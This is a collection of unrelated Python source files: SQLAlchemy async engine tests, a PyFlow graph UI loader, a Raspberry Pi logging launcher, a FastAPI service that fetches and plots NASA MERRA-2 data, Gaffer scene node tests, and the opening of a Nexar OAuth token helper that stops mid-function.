    async def test_keys(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            eq_(result.keys(), ["user_id", "user_name"])
            # close explicitly since the stream was never exhausted
            await result.close()

    @async_test
    async def test_unique_all(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            # UNION ALL duplicates each row; unique() must collapse them.
            result = await conn.stream(
                union_all(select(users), select(users)).order_by(
                    users.c.user_id
                )
            )
            all_ = await result.unique().all()
            eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])

    @async_test
    async def test_columns_all(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            # columns(1) restricts rows to the second column only
            all_ = await result.columns(1).all()
            eq_(all_, [("name%d" % i,) for i in range(1, 20)])

    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_partitions(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars(1)
            check_result = []
            # 19 rows in partitions of 5 -> sizes 5, 5, 5, 4
            async for partition in result.partitions(5):
                check_result.append(partition)
            if filter_ == "mappings":
                eq_(
                    check_result,
                    [
                        [
                            {"user_id": i, "user_name": "name%d" % i}
                            for i in range(a, b)
                        ]
                        for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
                    ],
                )
            elif filter_ == "scalars":
                eq_(
                    check_result,
                    [
                        ["name%d" % i for i in range(a, b)]
                        for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
                    ],
                )
            else:
                eq_(
                    check_result,
                    [
                        [(i, "name%d" % i) for i in range(a, b)]
                        for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
                    ],
                )

    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_one_success(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                select(users).limit(1).order_by(users.c.user_name)
            )
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars()
            u1 = await result.one()
            if filter_ == "mappings":
                eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
            elif filter_ == "scalars":
                eq_(u1, 1)
            else:
                eq_(u1, (1, "name%d" % 1))

    @async_test
    async def test_one_no_result(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                select(users).where(users.c.user_name == "nonexistent")
            )
            with expect_raises_message(
                exc.NoResultFound, "No row was found when one was required"
            ):
                await result.one()

    @async_test
    async def test_one_multi_result(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                select(users).where(users.c.user_name.in_(["name3", "name5"]))
            )
            with expect_raises_message(
                exc.MultipleResultsFound,
                "Multiple rows were found when exactly one was required",
            ):
                await result.one()

    @testing.combinations(
        ("scalars",), ("stream_scalars",), argnames="filter_"
    )
    @async_test
    async def test_scalars(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            if filter_ == "scalars":
                result = (await conn.scalars(select(users))).all()
            elif filter_ == "stream_scalars":
                result = await (await conn.stream_scalars(select(users))).all()
        eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
    """Behavior of the async facade when wrapped around a sync-only DBAPI:
    construction must fail, and async execution must raise AwaitRequired,
    while run_sync() remains usable.
    """

    def test_sync_dbapi_raises(self):
        with expect_raises_message(
            exc.InvalidRequestError,
            "The asyncio extension requires an async driver to be used.",
        ):
            create_async_engine("sqlite:///:memory:")

    @testing.fixture
    def async_engine(self):
        # Force-flag a sync sqlite engine as async to exercise AwaitRequired.
        engine = create_engine("sqlite:///:memory:", future=True)
        engine.dialect.is_async = True
        return _async_engine.AsyncEngine(engine)

    @async_test
    @combinations(
        lambda conn: conn.exec_driver_sql("select 1"),
        lambda conn: conn.stream(text("select 1")),
        lambda conn: conn.execute(text("select 1")),
        argnames="case",
    )
    async def test_sync_driver_execution(self, async_engine, case):
        with expect_raises_message(
            exc.AwaitRequired,
            "The current operation required an async execution but none was",
        ):
            async with async_engine.connect() as conn:
                await case(conn)

    @async_test
    async def test_sync_driver_run_sync(self, async_engine):
        async with async_engine.connect() as conn:
            res = await conn.run_sync(
                lambda conn: conn.scalar(text("select 1"))
            )
            assert res == 1
            assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
    """ReversibleProxy bookkeeping: retrieval / regeneration of async
    wrappers for sync connection and transaction objects, and GC of the
    proxy registry.
    """

    @async_test
    async def test_get_transaction(self, async_engine):
        async with async_engine.connect() as conn:
            async with conn.begin() as trans:
                is_(trans.connection, conn)
                is_(conn.get_transaction(), trans)

    @async_test
    async def test_get_nested_transaction(self, async_engine):
        async with async_engine.connect() as conn:
            async with conn.begin() as trans:
                n1 = await conn.begin_nested()
                is_(conn.get_nested_transaction(), n1)
                n2 = await conn.begin_nested()
                is_(conn.get_nested_transaction(), n2)
                await n2.commit()
                # after n2 completes, n1 is the current nested transaction
                is_(conn.get_nested_transaction(), n1)
            is_(conn.get_transaction(), trans)

    @async_test
    async def test_get_connection(self, async_engine):
        async with async_engine.connect() as conn:
            is_(
                AsyncConnection._retrieve_proxy_for_target(
                    conn.sync_connection
                ),
                conn,
            )

    def test_regenerate_connection(self, connection):
        # retrieving twice for the same sync target yields the same proxy
        async_connection = AsyncConnection._retrieve_proxy_for_target(
            connection
        )
        a2 = AsyncConnection._retrieve_proxy_for_target(connection)
        is_(async_connection, a2)
        is_not(async_connection, None)
        is_(async_connection.engine, a2.engine)
        is_not(async_connection.engine, None)

    @testing.requires.predictable_gc
    @async_test
    async def test_gc_engine(self, testing_engine):
        # the weak registry must drop the entry once the wrapper is GC'ed
        ReversibleProxy._proxy_objects.clear()
        eq_(len(ReversibleProxy._proxy_objects), 0)
        async_engine = AsyncEngine(testing.db)
        eq_(len(ReversibleProxy._proxy_objects), 1)
        del async_engine
        eq_(len(ReversibleProxy._proxy_objects), 0)

    @testing.requires.predictable_gc
    @async_test
    async def test_gc_conn(self, testing_engine):
        ReversibleProxy._proxy_objects.clear()
        async_engine = AsyncEngine(testing.db)
        eq_(len(ReversibleProxy._proxy_objects), 1)
        async with async_engine.connect() as conn:
            eq_(len(ReversibleProxy._proxy_objects), 2)
            async with conn.begin() as trans:
                eq_(len(ReversibleProxy._proxy_objects), 3)
                del trans
        del conn
        eq_(len(ReversibleProxy._proxy_objects), 1)
        del async_engine
        eq_(len(ReversibleProxy._proxy_objects), 0)

    def test_regen_conn_but_not_engine(self, async_engine):
        sync_conn = async_engine.sync_engine.connect()
        async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
        async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
        is_(async_conn, async_conn2)
        is_(async_conn.engine, async_engine)

    def test_regen_trans_but_not_conn(self, async_engine):
        sync_conn = async_engine.sync_engine.connect()
        async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
        trans = sync_conn.begin()
        async_t1 = async_conn.get_transaction()
        is_(async_t1.connection, async_conn)
        is_(async_t1.sync_transaction, trans)
        async_t2 = async_conn.get_transaction()
        is_(async_t1, async_t2)
|
graphUiParser.py | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import os
import sys
import json
import threading
import time
from Qt.QtWidgets import *
from Qt import QtGui
from Qt import QtCore
from PyFlow import INITIALIZE
from PyFlow.Core.Common import *
from PyFlow.Core.GraphManager import GraphManager
from PyFlow.UI.Canvas.UINodeBase import getUINodeInstance
from PyFlow.UI.Utils.stylesheet import editableStyleSheet
import PyFlow.UI.resources
def run(filePath):
    """Load a PyFlow graph file and expose its graphInputs nodes in a
    minimal Qt dialog, ticking the graph on a background thread.

    On failure (missing file, no graphInputs nodes, or a deserialization
    error) a critical message box is shown instead of the input dialog.

    :param filePath: path to the serialized PyFlow graph (JSON)
    """
    app = QApplication(sys.argv)
    app.setStyle(QStyleFactory.create("plastique"))
    app.setStyleSheet(editableStyleSheet().getStyleSheet())

    # Shared error dialog; configured and shown only on failure paths.
    msg = QMessageBox()
    msg.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
    msg.setIcon(QMessageBox.Critical)

    if os.path.exists(filePath):
        with open(filePath, 'r') as f:
            data = json.load(f)

        # Window to display inputs
        prop = QDialog()
        prop.setLayout(QVBoxLayout())
        prop.setWindowTitle(filePath)
        prop.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))

        # Initialize packages and deserialize the graph
        try:
            INITIALIZE()
            man = GraphManager()
            man.deserialize(data)
            grph = man.findRootGraph()
            inputs = grph.getNodesByClassName("graphInputs")
            # If no GraphInput nodes, show an error instead
            if len(inputs) > 0:
                for inp in inputs:
                    uiNode = getUINodeInstance(inp)
                    uiNodeJsonTemplate = inp.serialize()
                    uiNodeJsonTemplate["wrapper"] = inp.wrapperJsonData
                    uiNode.postCreate(uiNodeJsonTemplate)
                    # Build the editable widgets for this input node
                    # (return value was previously bound to an unused local).
                    uiNode.createOutputWidgets(prop.layout(), inp.name)
                prop.show()

                # fake main loop: tick the graph ~50x/second until quit
                stopEvent = threading.Event()

                def programLoop(stopEvent):
                    while not stopEvent.is_set():
                        man.Tick(deltaTime=0.02)
                        time.sleep(0.02)

                t = threading.Thread(target=programLoop, args=(stopEvent,))
                t.start()

                def quitEvent():
                    # Stop the tick thread before Qt tears down.
                    stopEvent.set()
                    t.join()

                app.aboutToQuit.connect(quitEvent)
            else:
                msg.setInformativeText(filePath)
                # fixed typo in the user-facing message ("containt")
                msg.setDetailedText("The file doesn't contain graphInputs nodes")
                msg.setWindowTitle("PyFlow Ui Graph Parser")
                msg.setStandardButtons(QMessageBox.Ok)
                msg.show()
        except Exception as e:
            msg.setText("Error reading Graph")
            msg.setInformativeText(filePath)
            msg.setDetailedText(str(e))
            msg.setWindowTitle("PyFlow Ui Graph Parser")
            msg.setStandardButtons(QMessageBox.Ok)
            msg.show()
    else:
        msg.setText("File Not Found")
        msg.setInformativeText(filePath)
        msg.setWindowTitle("PyFlow Ui Graph Parser")
        msg.setStandardButtons(QMessageBox.Ok)
        msg.show()

    try:
        sys.exit(app.exec_())
    except Exception as e:
        print(e)
|
main.py | import sys
import os
import yaml
import logging
import multiprocessing
from irrad_control.utils.proc_manager import ProcessManager
from ps_monitor.monitor import main as DoTheMonitoringThing
from ps_monitor import logger
logging.getLogger().setLevel("INFO")
def _configure_rpi_server(config, pm):
    """Connect to one RPi over SSH and prepare its server process.

    :param config: per-RPi config dict; must provide the host under "ip"
    :param pm: ProcessManager used for the SSH session
    """
    host = config["ip"]
    # Open the SSH connection first, then check out the development
    # branch on the remote without pulling.
    pm.connect_to_server(hostname=host, username='pi')
    pm.configure_server(hostname=host, branch="development", git_pull=False)
def main():
    """Configure every RPi listed in the YAML config, start a remote
    logger on each, then mirror the logging locally (plus an optional
    monitor process) until all workers finish or Ctrl-C."""
    # Path to the YAML run configuration is the last CLI argument.
    path_to_config_file = sys.argv[-1]
    config = logger.load_config(path_to_config_file)
    pm = ProcessManager()
    # 1) Configure all RPi s: connect, write per-RPi config + start
    #    script, copy both plus logger.py over, and launch it detached.
    for rpi in config['rpis']:
        logger.check_config(config['rpis'][rpi])
        _configure_rpi_server(config=config['rpis'][rpi], pm=pm)
        hostname = config['rpis'][rpi]["ip"]
        # Create config yaml per RPi
        with open("{}_config.yaml".format(rpi), "w") as rpi_config:
            yaml.safe_dump(data=config['rpis'][rpi], stream=rpi_config)
        # Create start script per RPi (activates conda env, runs logger)
        cmd = 'echo "{}"'.format("source /home/pi/miniconda2/bin/activate; python logger.py %s_config.yaml" % rpi) + ' > ${HOME}/start_logger.sh'
        pm._exec_cmd(hostname, cmd)
        # Copy config_yaml and logger.py to home folder of Rpi
        pm.copy_to_server(hostname, os.path.join(os.getcwd(), "{}_config.yaml".format(rpi)), "/home/pi/{}_config.yaml".format(rpi))
        pm.copy_to_server(hostname, os.path.join(os.path.dirname(__file__), 'logger.py'), "/home/pi/logger.py")
        # Detached launch so the remote logger survives the SSH session.
        pm._exec_cmd(hostname, 'nohup bash /home/pi/start_logger.sh &')
    # 2) Run a local logger process per RPi in read-write mode.
    workers = []
    for rpi in config["rpis"]:
        config["rpis"][rpi]["log_type"] = "rw"
        worker = multiprocessing.Process(target=logger.logger, kwargs=config["rpis"][rpi])
        workers.append(worker)
        worker.start()
    # 3) Optionally start the monitoring process alongside the loggers.
    if config['monitor']:
        worker = multiprocessing.Process(target=DoTheMonitoringThing, args=(config["rpis"],))
        workers.append(worker)
        worker.start()
    # Block until all workers exit; Ctrl-C terminates them instead.
    try:
        for w in workers:
            w.join()
    except KeyboardInterrupt:
        for w in workers:
            w.terminate()
# Script entry point: read the config path from argv and launch everything.
if __name__ == "__main__":
    main()
|
app.py | import logging
import os
import sys
from sys import stdout
import json
from unicodedata import name
import urllib3
import certifi
import io
from typing import List
import requests
from time import sleep
from fastapi import FastAPI
import xarray as xr
from models import MerraClientRequest
import matplotlib.pyplot as plt
import uvicorn
from fastapi.responses import StreamingResponse
from threading import Thread
# Root logger writing both to ingestor.log (append mode) and stdout,
# sharing one "<level> <time> - <message>" format.
logger = logging.getLogger()
log_fhandler = logging.FileHandler('ingestor.log', mode='a')
log_shandler = logging.StreamHandler(stdout)
formatter = logging.Formatter(
    '%(levelname)s %(asctime)s - %(message)s')
log_shandler.setFormatter(formatter)
log_fhandler.setFormatter(formatter)
logger.addHandler(log_fhandler)
logger.addHandler(log_shandler)
# FastAPI application; served by uvicorn from the __main__ guard.
app = FastAPI()
# Create a urllib PoolManager instance to make requests
# (certificate verification enabled via certifi's CA bundle).
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED',ca_certs=certifi.where())
# Set the URL for the GES DISC subset service endpoint
url = 'https://disc.gsfc.nasa.gov/service/subset/jsonwsp'
# This method POSTs formatted JSON WSP requests to the GES DISC endpoint URL
# It is created for convenience since this task will be repeated more than once
def get_http_data(request):
    """POST a JSON WSP request to the GES DISC endpoint and return the
    decoded JSON response.

    Exits the process when the service replies with a jsonwsp/fault,
    i.e. when the request itself was malformed.
    """
    headers = {
        'Content-Type': 'application/json',
        'Accept': 'application/json',
    }
    body = json.dumps(request)
    raw = http.request('POST', url, body=body, headers=headers)
    response = json.loads(raw.data)
    # Check for errors
    if response['type'] == 'jsonwsp/fault':
        print('API Error: faulty %s request' % response['methodname'])
        sys.exit(1)
    return response
def create_subset_request(begTime, endTime):
    """Build the jsonwsp 'subset' request body for the M2I3NPASM product.

    Requests the T, RH and O3 variables, cropped to a [-180,-80,180,80]
    lat/lon box, sliced to a fixed set of model levels.

    :param begTime: subset start time (string accepted by the service)
    :param endTime: subset end time
    :returns: dict ready to be POSTed via get_http_data()
    """
    product = 'M2I3NPASM_5.12.4'
    varNames = ['T', 'RH', 'O3']
    dimName = 'lev'
    dimVals = [1, 4, 7, 13, 17, 19, 21, 22, 23, 24, 25, 26, 27, 29, 30,
               31, 32, 33, 35, 36, 37]
    # One dimension name:value pair per requested model level
    # (comprehension replaces the index-based loop).
    dimSlice = [{'dimensionId': dimName, 'dimensionValue': val} for val in dimVals]
    subset_request = {
        'methodname': 'subset',
        'type': 'jsonwsp/request',
        'version': '1.0',
        'args': {
            'role': 'subset',
            'start': begTime,
            'end': endTime,
            'box': [-180, -80, 180, 80],
            'crop': True,
            # Every variable gets the identical level slice.
            'data': [{'datasetId': product, 'variable': name, 'slice': dimSlice}
                     for name in varNames],
        }
    }
    return subset_request
def get_subset_data(start_time, end_time):
    """Submit a subset job to GES DISC, poll it to completion, and
    return the list of downloadable URL items.

    Exits the process if the job fails.

    :param start_time: subset start time
    :param end_time: subset end time
    :returns: list of result dicts that carry a download 'link'
    """
    # Submit the subset request to the GES DISC Server
    response = get_http_data(create_subset_request(start_time, end_time))
    # Report the JobID and initial status
    myJobId = response['result']['jobId']
    print('Job ID: '+myJobId)
    print('Job status: '+response['result']['Status'])
    status_request = {
        'methodname': 'GetStatus',
        'version': '1.0',
        'type': 'jsonwsp/request',
        'args': {'jobId': myJobId}
    }
    # Check on the job status after a brief nap
    while response['result']['Status'] in ['Accepted', 'Running']:
        sleep(1)
        response = get_http_data(status_request)
        status = response['result']['Status']
        percent = response['result']['PercentCompleted']
        print ('Job status: %s (%d%c complete)' % (status,percent,'%'))
    if response['result']['Status'] == 'Succeeded' :
        print ('Job Finished: %s' % response['result']['message'])
    else :
        print('Job Failed: %s' % response['fault']['code'])
        sys.exit(1)
    # Retrieve a plain-text list of results in a single shot using the saved JobID
    batchsize = 20
    results_request = {
        'methodname': 'GetResult',
        'version': '1.0',
        'type': 'jsonwsp/request',
        'args': {
            'jobId': myJobId,
            'count': batchsize,
            'startIndex': 0
        }
    }
    # Retrieve the results in JSON in multiple batches.
    # Initialize variables, then submit the first GetResults request;
    # add the results from this batch to the list and increment the count.
    results = []
    count = 0
    response = get_http_data(results_request)
    count = count + response['result']['itemsPerPage']
    results.extend(response['result']['items'])
    # Increment the startIndex and keep asking for more results until we have them all
    total = response['result']['totalResults']
    while count < total :
        results_request['args']['startIndex'] += batchsize
        response = get_http_data(results_request)
        count = count + response['result']['itemsPerPage']
        results.extend(response['result']['items'])
    # Check on the bookkeeping
    print('Retrieved %d out of %d expected items' % (len(results), total))
    # Sort the results into documents and URLs: data items carry
    # 'start'/'end' keys, documentation items do not.
    docs = []
    urls = []
    for item in results:
        try:
            if item['start'] and item['end'] : urls.append(item)
        except KeyError:
            # narrowed from a bare except: only a missing key means
            # "this is a documentation item"
            docs.append(item)
    return urls
#Download datasets from the GES DISC server using urls
def download_data(urls):
# Use the requests library to submit the HTTP_Services URLs and write out the results.
print('\nHTTP_services output:')
files = []
for item in urls :
URL = item['link']
#Check if the file exists in the local directory, if yes keep it, if not download it
if os.path.isfile('./netCDF/' + item['label']):
print('File %s already exists' % item['label'])
files.append(item['label'])
continue
result = requests.get(URL)
try:
result.raise_for_status()
outfn = item['label']
files.append(outfn)
f = open(f'./netCDF/{outfn}','wb')
f.write(result.content)
f.close()
print(outfn, "is downloaded")
except:
print('Error! Status code is %d for this URL:\n%s' % (result.status_code,URL))
print('Help for downloading data is at https://disc.gsfc.nasa.gov/data-access')
print('Downloading is done and find the downloaded files in your current working directory')
return files
def do_plot(file, parameter):
    """Render the time-mean of one variable at model level index 10 as a
    transparent PNG.

    Saves '<file>.png' next to the working directory AND returns the
    same image as an in-memory buffer.

    :param file: netCDF file name inside ./netCDF/
    :param parameter: variable name; 'T', 'RH' or 'O3'
    :returns: io.BytesIO positioned at 0, containing the PNG bytes
    """
    ds = xr.open_dataset('./netCDF/' + file)
    # Key access avoids the Dataset attribute lookup (`ds.T` can collide
    # with the transpose property) and collapses the three identical
    # branches of the original into one.
    figu = ds[parameter].isel(lev=10).mean(dim='time')
    # Temperature uses the reversed colormap, the others the normal one.
    cmap = 'jet_r' if parameter == 'T' else 'jet'
    f = plt.subplots(figsize=(31.54, 20))
    im = plt.imshow(figu, alpha=0.3, cmap=cmap)
    plt.axis('off')
    plt.savefig(file + '.png', transparent=True, bbox_inches='tight', pad_inches=0)
    bytes_image = io.BytesIO()
    plt.savefig(bytes_image, format='png', transparent=True, bbox_inches='tight', pad_inches=0)
    bytes_image.seek(0)
    return bytes_image
def convert_files(files):
    """Convert downloaded netCDF files to zarr stores under ./zarr/.

    NOTE(review): the actual `to_zarr` call is commented out, so this
    currently only opens and closes each dataset. Also the existence
    check tests '<name>.zarr' with the '.nc' suffix still attached,
    which disagrees with the commented-out output name — confirm the
    intended naming before re-enabling. A dataset skipped via
    `continue` is never close()d — verify that is acceptable.
    """
    for file in files:
        ds = xr.open_dataset(f'./netCDF/{file}')
        # check if zarr file exists
        if os.path.isfile(f'./zarr/{file}.zarr'):
            logger.info(f'File {file}.zarr already exists')
            continue
        # ds.to_zarr('./zarr/'+file.replace('.nc','.zarr'))
        ds.close()
    logger.info('Converted files to zarr format')
@app.post('/')
async def serve(request: MerraClientRequest) -> List[float]:
    """Handle a subset request: fetch MERRA-2 data for the requested
    date range, stream back a rendered PNG, and convert the files to
    zarr on a background thread.

    :param request: client request with startdate, enddate, parameter
    """
    try:
        logger.debug(f'Incoming request: {request}')
        urls_ = get_subset_data(request.startdate, request.enddate)
        files = download_data(urls_)
        if files:
            try:
                bytes_image = do_plot(files[0], request.parameter)
                # BUG FIX: the original used Thread(target=convert_files(files)),
                # which calls convert_files synchronously and hands Thread its
                # None return value. Pass the callable plus args instead.
                thread = Thread(target=convert_files, args=(files,))
                thread.start()
                return StreamingResponse(content=bytes_image, media_type='image/png')
            except ValueError as e:
                print(e)
        else:
            print('No files are downloaded or there is no data in the time range')
            # NOTE(review): sys.exit(1) inside a request handler kills the
            # whole server process — confirm this is really intended.
            sys.exit(1)
    except Exception as e:
        logger.error(e)
        return e
# Run the FastAPI app with uvicorn when executed directly.
if __name__ == "__main__":
    uvicorn.run(app, host='0.0.0.0', port=8080)
|
SceneNodeTest.py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import IECore
import Gaffer
import GafferTest
import GafferScene
import GafferSceneTest
class SceneNodeTest( GafferTest.TestCase ) :
	"""Tests for the root-level constraints and caching behaviour of
	GafferScene.SceneNode derived nodes."""

	def testRootConstraints( self ) :

		# we don't allow the root of the scene ("/") to carry objects, transforms,
		# or attributes. if we did, then there wouldn't be a sensible way of merging
		# them (particularly transforms) when a Group node has multiple inputs.
		# it's also pretty confusing to have stuff go on at the root level,
		# particularly as the root isn't well represented in the SceneHierarchy editor,
		# and applications like maya don't have stuff happening at the root
		# level either. we achieve this by having the SceneNode simply not
		# call the various processing functions for the root.

		node = GafferSceneTest.CompoundObjectSource()
		node["in"].setValue(
			IECore.CompoundObject( {
				"object" : IECore.SpherePrimitive()
			} )
		)
		self.assertEqual( node["out"].object( "/" ), IECore.NullObject() )

		node = GafferSceneTest.CompoundObjectSource()
		node["in"].setValue(
			IECore.CompoundObject( {
				"transform" : IECore.M44fData( IECore.M44f.createTranslated( IECore.V3f( 1 ) ) )
			} )
		)
		self.assertEqual( node["out"].transform( "/" ), IECore.M44f() )

		node = GafferSceneTest.CompoundObjectSource()
		node["in"].setValue(
			IECore.CompoundObject( {
				"attributes" : IECore.CompoundObject()
			} )
		)
		self.assertEqual( node["out"].attributes( "/" ), IECore.CompoundObject() )

	def testTypeNamePrefixes( self ) :

		self.assertTypeNamesArePrefixed( GafferScene, namesToIgnore = set( ( "IECore::PathMatcherData", ) ) )

	def testDefaultNames( self ) :

		self.assertDefaultNamesAreCorrect( GafferScene )

	def testRootAttributes( self ) :

		# create node inheriting from SceneNode:
		node = GafferScene.CustomAttributes()
		node["attributes"].addOptionalMember( "user:foobar", True, enabled = True )

		# scene nodes always have passthrough behaviour for attributes at the root, so this particular one should return an empty compound object:
		context = Gaffer.Context()
		context.set( "scene:path", IECore.InternedStringVectorData([]) )
		with context:
			self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject() )

		# unless the caching system is misbehaving, it should return the attribute values we asked for at other locations:
		context.set( "scene:path", IECore.InternedStringVectorData(["yup"]) )
		with context:
			self.assertEqual( node["out"]["attributes"].getValue(), IECore.CompoundObject({'user:foobar':IECore.BoolData( 1 )}) )

	def testRootObject( self ):

		# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
		sphere = GafferScene.Sphere()
		context = Gaffer.Context()
		context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
		with context:
			self.assertEqual( sphere["out"]["object"].getValue().typeId(), IECore.MeshPrimitive.staticTypeId() )

		# right, now subtree it. If the cache is behaving itself, then there shouldn't be an object at the root of the
		# resulting scene, cuz that aint allowed.
		subTree = GafferScene.SubTree()
		subTree["in"].setInput( sphere["out"] )
		subTree["root"].setValue("sphere")
		context.set("scene:path", IECore.InternedStringVectorData([]) )
		with context:
			self.assertEqual( subTree["out"]["object"].getValue().typeId(), IECore.NullObject.staticTypeId() )

	def testRootTransform( self ):

		# okie dokie - create a sphere node and check it's generating a sphere in the correct place:
		sphere = GafferScene.Sphere()
		sphere["transform"]["translate"]["x"].setValue( 1.0 )
		sphere["transform"]["translate"]["y"].setValue( 2.0 )
		sphere["transform"]["translate"]["z"].setValue( 3.0 )
		context = Gaffer.Context()
		context.set("scene:path", IECore.InternedStringVectorData(["sphere"]) )
		with context:
			self.assertEqual( sphere["out"]["transform"].getValue(), IECore.M44f.createTranslated( IECore.V3f( 1,2,3 ) ) )

		# right, now subtree it. If the cache is behaving itself, then the transform at the root of the
		# resulting scene should be set to identity.
		subTree = GafferScene.SubTree()
		subTree["in"].setInput( sphere["out"] )
		subTree["root"].setValue("sphere")
		context.set("scene:path", IECore.InternedStringVectorData([]) )
		with context:
			self.assertEqual( subTree["out"]["transform"].getValue(), IECore.M44f() )

	def testCacheThreadSafety( self ) :

		p1 = GafferScene.Plane()
		p1["divisions"].setValue( IECore.V2i( 50 ) )
		p2 = GafferScene.Plane()
		p2["divisions"].setValue( IECore.V2i( 51 ) )
		g = GafferScene.Group()
		g["in"].setInput( p1["out"] )
		g["in1"].setInput( p2["out"] )

		# not enough for both objects - will cause cache thrashing
		Gaffer.ValuePlug.setCacheMemoryLimit( p1["out"].object( "/plane" ).memoryUsage() )

		exceptions = []
		def traverser() :
			try :
				GafferSceneTest.traverseScene( g["out"] )
			# "except Exception, e" was Python-2-only syntax; "as" works
			# on Python 2.6+ and Python 3 alike.
			except Exception as e :
				exceptions.append( e )

		threads = []
		for i in range( 0, 10 ) :
			thread = threading.Thread( target = traverser )
			threads.append( thread )
			thread.start()

		for thread in threads :
			thread.join()

		# re-raise anything a worker thread caught
		for e in exceptions :
			raise e

	def testNodesConstructWithDefaultValues( self ) :

		self.assertNodesConstructWithDefaultValues( GafferScene )

	def setUp( self ) :

		# remember the limit so tearDown() can restore it after
		# testCacheThreadSafety() shrinks it
		self.__previousCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()

	def tearDown( self ) :

		Gaffer.ValuePlug.setCacheMemoryLimit( self.__previousCacheMemoryLimit )
# Allow running this test module directly.
if __name__ == "__main__":
	unittest.main()
|
nexar_token.py | """Main entry point to the service."""
import base64
import hashlib
import os
import re
import webbrowser
from multiprocessing import Process
from urllib.parse import parse_qs, urlparse
import requests
from oauthlib.oauth2 import BackendApplicationClient
from oauthlib.oauth2.rfc6749.errors import MissingTokenError
from requests_oauthlib import OAuth2Session
from local_service import main
PROD_TOKEN_URL = "https://identity.nexar.com/connect/token"
REDIRECT_URI = "http://localhost:3000/login"
AUTHORITY_URL = "https://identity.nexar.com/connect/authorize"
def get_token(client_id, client_secret):
    """Return the Nexar token from the client_id and client_secret provided.

    Uses the OAuth2 client-credentials flow against the production
    token endpoint.

    Raises:
        Exception: if either credential is empty.
        MissingTokenError: if the server reply contains no token
            (propagates from fetch_token; the original wrapped this in
            an `except MissingTokenError: raise` no-op handler).
    """
    if not client_id or not client_secret:
        raise Exception("client_id and/or client_secret are empty")
    client = BackendApplicationClient(client_id=client_id)
    oauth = OAuth2Session(client=client)
    return oauth.fetch_token(
        token_url=PROD_TOKEN_URL,
        client_id=client_id,
        client_secret=client_secret,
        include_client_id=True,
    )
def get_token_with_login(client_id, client_secret, scope):
    """Open the Nexar authorization url from the client_id and scope provided.

    Runs the OAuth2 authorization-code flow with PKCE: starts a local
    redirect-catching service, opens the browser for user consent,
    then exchanges the pasted redirect URL's code for a token.

    Raises:
        Exception: if a credential or the scope is empty; any error
            from the HTTP exchange propagates unchanged.
    """
    if not client_id or not client_secret:
